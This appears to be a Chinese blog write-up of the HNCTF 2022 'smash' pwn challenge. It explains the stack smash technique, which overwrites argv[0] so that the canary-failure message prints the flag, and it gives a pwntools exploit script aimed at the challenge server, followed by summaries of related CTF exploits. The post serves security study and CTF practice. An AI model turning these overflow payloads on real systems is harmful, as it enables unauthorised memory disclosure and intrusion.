【pwn】[HNCTF 2022 WEEK3]smash --花式栈溢出

最新推荐文章于 2025-05-26 13:53:04 发布
原创 最新推荐文章于 2025-05-26 13:53:04 发布 · 166 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #c语言 #安全 #python #网络

部署运行你感兴趣的模型镜像

拿到程序,先查一下保护状态

​编辑

没开pie,接着看主函数代码逻辑

​编辑

看到这里,因为程序开了canary,本程序没有可以泄露canary的方法,所以普通的栈溢出方法肯定打不了,这里可以考虑一下smash stack

Stack smash       

       在程序加了 canary 保护之后,如果我们读取的 buffer 覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。而 stack smash 技巧则就是利用打印这一信息的程序来得到我们想要的内容。这是因为在程序启动 canary 保护之后,如果发现 canary 被修改的话,程序就会执行 __stack_chk_fail 函数来打印 argv[0] 指针所指向的字符串,正常情况下,这个指针指向了程序名。
所以我们只要将argv[0]改成buf地址,就可以将flag的值打印出来,我们可以动调看一下argv[0]的地址,可以使用print &__libc_argv[0]查看

​编辑

再来看一下栈底地址

​编辑

这样就可以算出我们读入数据的地址到argv[0]的偏移

exp:

from pwn import *

context(os='linux',arch='amd64',log_level='debug')

io=remote("node5.anna.nssctf.cn",28952)

arg=0x7fffffffe538

flag_addr=0x404060

stack_rbp=0x7fffffffe450

offset=arg-stack_rbp+0x110

payload=b'a'*offset+p64(flag_addr)

io.recvuntil(b"Good Luck.\n")

io.send(payload)

io.interactive()

​编辑

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

GGb0mb
关注
PWN-沙箱绕过-侧信道爆破攻击-[HNCTF 2022 WEEK3]ret2shellcode_level2
Welcome To My6n Blog
06-05 658
该分析针对一个存在缓冲区溢出漏洞的程序,沙箱限制了系统调用仅允许read、open和mmap。通过构造shellcode实现侧信道攻击,利用时间差异逐字节爆破flag内容。最终获取flag为nssctf{S1d3_ch@nn3l_bl@st1ng_t0_g3t_fl4g}。主要步骤包括:1)注入可执行shellcode;2)打开flag文件并读取内容;3)编写比较代码进行字符爆破。
PWN-中级ROP-[HNCTF 2022 WEEK2]ret2csu
最新发布
Welcome To My6n Blog
06-06 1515
本文分析了64位程序中利用__libc_csu_init函数进行栈溢出攻击的技术。通过控制寄存器传递参数,结合ret2csu技术泄露write函数地址,最终实现ret2libc攻击。文章详细讲解了gadgets选择、参数传递方法和攻击流程,并提供了完整的攻击脚本(exp)。该技术在不直接获取system函数和/bin/sh字符串的情况下,成功获取了shell权限,最终得到了flag。
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2642
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
[HNCTF 2022 WEEK3] smash 复现
Xzzzz911的博客
09-07 1066
这题感觉稍微了解了Stack smash这种花式栈溢出的方法,这题理解起来比较友好,其他的题像网鼎杯那道相同的方法的不太好理解,总之就是自己知识储备不够,加油,卷起来,冲冲冲!!!
Jarvis OJ -pwn smashes
hanqdi_的博客
02-05 476
pwn smashes 题目分析 检查保护机制 开启NX,canary,fortify 保护,可以得出不能往堆栈中写入shellcode进行控制利用。 ida中打开 输入不正确的canary后,会触发栈保护错误,利用打印出argv[0]的地址覆盖成想要输出内容的地址。 想要输出的flag的地址,在程序中存在,所以能找到。 angv[0]_addr:即程序名的地址。在ma...
18.9.19 Jarvis OJ PWN----Smashes
qq_42192672的博客
09-19 617
先checksec一下 我的天,有栈保护,nx,咋办…… IDA进去,我们可以看见有个函数挺关键的,如下 我们可以看到stdin是可以无限输入的,但是只有接收输入时接收到'\n',才会继续执行(跳出while循环),找不出栈溢出的办法 然后看了大佬的操作之后发现:可以故意触发canary来攻击(SSP(Stack Smashing Protector ) leak) 先介绍一下好...
JarvisOJ PWN smashes WP
苗_的博客
01-15 469
Smashes 涉及到一些新的知识,以下为转载大佬的一篇博客: 这道题利用是保护机制本身的一种漏洞: 在程序加了canary保护之后,如果我们读取的buffer覆盖了对应的值时,程序就会报错,而一般来说我们并不会关心报错信息。 而stack smash技巧则就是利用打印这一信息的程序来得到我们想要的内容。 这是因为在程序发现canary保护之后,如果发现canary被修改的话,程序就会执行_...
PWN [HNCTF 2022 WEEK4]ezheap WP 图解
千年暗室,一灯即明
06-14 1879
PWN [HNCTF 2022 WEEK4]ezheap WP 图解
Partial Overwrite绕过PIE保护-[HNCTF 2022 WEEK2]ret2text
Welcome To My6n Blog
05-26 500
程序存在栈溢出漏洞,但因PIE保护导致地址随机化。利用PIE后12位固定特性,通过Partial Overwrite技术爆破后门函数地址(后四位0x11E5概率1/16)。编写exp循环发送payload(填充+后门地址),成功绕过PIE保护获取shell,得到flag:nssctf{W0w_You_byp@ss3d_PIE_You_are_gr3at!}。
hnctf-pwn-week2
m0_64174759的博客
11-26 1172
逆向,整数溢出,orw,栈迁移,ret2csu,partial overwrite
[Jarvis OJ - PWN]——Smashes
Y_peak的博客
02-16 302
[Jarvis OJ - PWN]——Smashes 题目地址: https://www.jarvisoj.com/challenges 题目: 还是先checksec一下看看。64位,并且除了PIE,其他保护基本都开启了。 在IDA中看看 发现有可以利用的栈溢出, 我原本的想法是将canary给泄露出来。但是看到触发了canary保护后的结果, 有点不对劲。 修改了文件名后,我确定了, 泄露的就是argv[0]。我们可以通过将其覆盖, 主动触发canary保护, 将flag拿到手。 我们
jarvisoj pwn smashes (2015 32c3-ctf hackme) [Stack Smash]
ACdream
02-07 731
题目链接: https://www.jarvisoj.com/challenges 题目bin文件来源: github - ctfswriteup - 2015 - 32c3ctf - pwn - hackme   分析过程: 开启了NX与Canary 程序流程: 输入名字之后,即可输入一个地址去覆盖flag~这里涉及的知识点是:Stack Smash 当程序开启了Can...
canary入门小总结(遇到的新题型:jarvis oj pwn smashes解题以及一些基础了解)
ins_Digger的博客
11-01 994
今天的我还是在做pwn题,没怎么看书。本来今天打算做picoCTF的pwn题的,无奈怎么也连不上它的shell。(难受)然后去Jarvis OJ 做pwn题去了。 题目挑着做,总共只做了两题。第一题是简单的栈溢出。第二题就很有趣了,是我没遇过的题 看网上大神们写的writeup叫做canary。 做完题目后稍微去搜索了一下关于这种题目的资料。(这里吐槽一下有些写writeup的博主,本来就是新手题...
pwn学习-jarvisoj-smashes-利用canary打印信息
qq_45653588的博客
12-22 399
下载文件,先检查一下保护机制,开得还挺多的。 反编译一下查看伪代码。 unsigned __int64 sub_4007E0() { __int64 v0; // rbx int v1; // eax __int64 v3; // [rsp+0h] [rbp-128h] unsigned __int64 v4; // [rsp+108h] [rbp-20h] v4 = __readfsqword(0x28u); __printf_chk(1LL, "Hello!\nWhat's
hackme pwn smash-the-stack [stack smash]
ACdream
02-07 397
根据提示:stderr!和32C3的readme一样,原理看上篇,这里贴两个exp #! /usr/bin/env python # coding=utf-8 from pwn import * #io = process('./smash-the-stack') io = remote('hackme.inndy.tw', 7717) argv_addr = 0xffffcfa4 buf...
PWN · Stack Smash】[2021 鹤城杯]easyecho
Mr_Fmnwon的博客
07-30 1593
Canary保护,是在栈上插入一段随机数;进入函数后,也就是call完后会有push ebp,mov ebp,esp,最后来个mov esp。canary保护特殊在上述操作后会再加一个canary。最后函数leave ret前会检测一次,canary与原先值是否相同来判断是否被栈溢出覆盖返回地址了。然而,Smash这种方法,恰好是利用Canary保护机制,修改相关函数参数,泄露信息。详细介绍Smash的文章不在少数,本文主要聚焦于做出题目,因此重点(但非详细)阐述我所理解的重点部分。
NSSCTF靶场练习---HNCTF2022Week3&4部分wp
Sciurdae的博客
12-05 1915
函数来获取DLL中某个导出函数的地址,在这里就是,加载Dll1.dll,来获取其中名为ttt的函数地址,之后将其保存在ProcAddress变量中。不过这题不用怎么过,直接动态调试就好,断点下载11行main函数处,之后看汇编,在第一处exit处要跳过。加载了一个名为Dll1.dll的动态链接库,这个函数会返回一个模块的句柄hModule。IDA64打开,发现就是一个TEA加密,然后用dododo函数对v6(key)做了加密。之后就一直F8,直到程序打印出新的key就好了。先查壳,无壳,64bit。
[山海关crypto 训练营 day18]
cxiaodi的博客
05-23 462
5.22补
web SSTI 刷题记录
rev1ve的博客
08-26 1018
SSTI模板注入 刷题记录 [CISCN 2019华东南]Web11,[HDCTF 2023]SearchMaster,[HNCTF 2022 WEEK2]ez_SSTI
[HNCTF 2022 WEEK2]ret2csu
12-27
### HNCTF 2022 WEEK2 ret2csu Challenge Solution #### 利用ret2csu技术实现漏洞利用 在处理`HNCTF 2022 WEEK2`的`ret2csu`挑战时,目标是通过控制程序流来调用特定函数并最终执行任意命令。此方法依赖于对`.text...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值